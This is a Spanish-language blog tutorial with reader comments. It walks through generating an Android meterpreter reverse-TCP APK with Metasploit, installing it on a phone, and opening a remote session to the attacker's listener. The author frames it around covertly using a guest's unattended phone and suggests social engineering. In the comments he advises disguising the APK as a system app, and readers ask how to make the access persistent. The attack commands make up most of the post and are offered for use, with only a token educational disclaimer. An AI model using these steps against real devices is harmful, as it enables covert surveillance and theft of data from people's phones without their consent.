Blog

Metasploit + Android + un novato

Hola!

Hoy voy usar Metasploit para acceder a un terminal Android. La idea me vino el otro día, que tuve visita. En un momento dado, alguien fue al baño y dejó el móvil en el salón. De repente, se me ocurrió probar metasploit con el móvil.

Tuve varias ocurrencias, usando la red propia como ajenas o, incluso, creando un AP.

En este caso voy a explicarlo como lo he realizado yo. He visto varios métodos y creo que este es más sencillo.

Recordad que técnicas y modos hay miles, pero esto lo explico para gente que está empezando como yo y vamos avanzando poco a poco.

Comenzamos…

Una vez que tenemos la terminal abierta, entramos en metasploit y vemos que payload nos interesa.

Comando “msfconsole”.

1

Actualizamos y, una vez que cargue, ponemos “search android”.

2

Hay lo tenemos….abrimos otra terminal para crear el payload.

Antes vemos la nuestra IP, usando el comando ifconfig. Una vez que lo tenemos, procedemos a crear el payload.

Para ello tenemos que poner “msfpayload ruta del payload LHOST ip atacante LPORT puerto atacante R > ruta archivo/archivo.apk”. Ponemos R para que sea archivo apk.

3

Una vez que tenemos el archivo, tenemos que instalarlo en el móvil (ya que tenemos acceso físico al mismo, lo podemos instalar nosotros mismo…y si no, usar ingeniería social para que lo hagan por nosotros). Lo ideal es tener el archivo en un servidor y disponible para poder acceder a él desde el terminal e instalarlo. Bueno, ya está dentro del terminal (en este caso, usaré un Galaxy S2).

Mientras tenemos que tener a nuestra máquina a la escucha, esperando que se ejecute la aplicación en el móvil…

 

 

Para ello volvemos al terminal donde tenemos abierto metasploit y lo ponemos a la escucha de la siguiente manera:

“use multi/handler” para iniciar la escucha

“set PAYLOAD Android/meterpreter/reverse_tcp” para indicar el payload que usamos

“set LHOST ipatacante” para indicar IP atacante

“set LPORT número” para indicar puerto a atacar

*indicar que tanto ip como puerto tienen que ser los que pusimos en el payload.

Una vez rellenas las variables, ponemos “exploit” y comenzará la escucha….esperar a que ejecuten el apk instalado….

4

Aquí tenéis el archivo instalado….

screen1 screen2 screen4

Procedemos a ejecutar el apk en el móvil. En el terminal nos aparece esto:

5

Ya tenemos sesión abierta 🙂

Podemos poner “help” para ver que comandos tenemos disponibles….

6

Y la captura….

capturametasandroid_

Un saludo….y recordad que esto es para usos educativos….hacedlo en entornos controlados..

David (@darksh4m4n)

  1. Salva
    Salva05-02-2014

    Muy muy bueno! Una pregunta:

    Se podria blindear ese .apk con otro .apk para hacerlo mas creible?

    • David
      David05-09-2014

      Muchas Gracias Salva!!
      Lo que puedes hacer es enmascararlo como una aplicación del sistema (si lo instalas tu en el movil, aprovechando un descuido).
      Pues lo voy a trastear, ya tengo más entretenimiento!!!
      Un saludo!!

  2. made1993
    made199305-07-2014

    Muy bueno, lo intentare probar en unos dias.

    • David
      David05-09-2014

      Gracias!!
      Pruebalo, es bastante sencillo. He visto otros metodos, pero creo que con este es menos lioso para los que empezamos.
      Un saludo

  3. TheEpicHack
    TheEpicHack08-31-2014

    Esta genial, yo ya había utilizado metasploit muchas veces, pero nunca pense que se pudiera utilizar en android. Muchas gracias :-).

    • David
      David09-02-2014

      Me alegra que te vaya bien TheEpicHack!!

      Un saludo!!!

  4. fagu24
    fagu2409-04-2014

    Hola quisiera saber como ejecutar el comando msfpayload en windows. Tengo instalado Metasploit, pero al poner “msfpayload” en el “System Console” me dice “Acceso denegado.”

    • David
      David09-06-2014

      Hola fagu24!
      Podrias poner alguna captura y explicar lo que haces?
      Asi podemos ver que es lo que ocurre…muchas gracias…

  5. Janker
    Janker09-28-2014

    Me he tomado 2 meses en leer y sólo leer pero no he empezado, lo que aún no entiendo son los programas que hay que descargar para empezar; gustarías en responderme? yo si he robado cosas así interesantes pero más que todo metiéndole psicología social por medio de las redes sociales y una vez ya hace unos años con un troyano, quiero volver a ésto pero para empezar, dime que debo descargar.

  6. Alejandro
    Alejandro10-24-2014

    Hola, muy buen tutorial.
    Tengo una pregunta: ¿Como puedo acceder a ciertos archivos?
    El problema está en que cuando intento entrar en ciertos directorios me devuelve el siguiente error: stdapi_fs_chdir: Operation failed: 1

  7. Jadcode
    Jadcode11-30-2014

    Buenos dias.

    Primero que todo muy buen tutorial, ha funcionado perfectamente pero el dilema esta en volver hacer la conexion obligando a que lo vuelvan a ejecutar.

    Existe alguna forma para convertirlo en un servicio persistente?

    Saludos

Leave a Reply

*

    No Twitter Messages